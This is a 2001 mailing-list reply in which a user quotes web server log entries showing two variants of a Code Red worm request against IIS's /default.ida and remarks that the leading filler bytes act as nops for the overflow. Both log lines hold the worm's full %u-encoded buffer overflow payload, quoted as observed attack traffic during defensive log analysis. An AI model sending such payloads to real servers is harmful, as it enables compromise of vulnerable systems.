On Sun, Aug 05, 2001 at 11:53:09AM +1200, Juha Saarinen wrote: I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-( Noticed that the GET requests look different now: 203.231.234.229 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 283 "-" "-" Whereas earlier on, they looked like this: 65.192.84.7 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u90 90%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-" The initial bytes are filler bytes which mean the overflow can be less precises (they are effectively nops). Attached is a hack I wrote to pull these things apart from a long file. If anyone has any really good (non-truncated) log entries, I'd me interested. --cw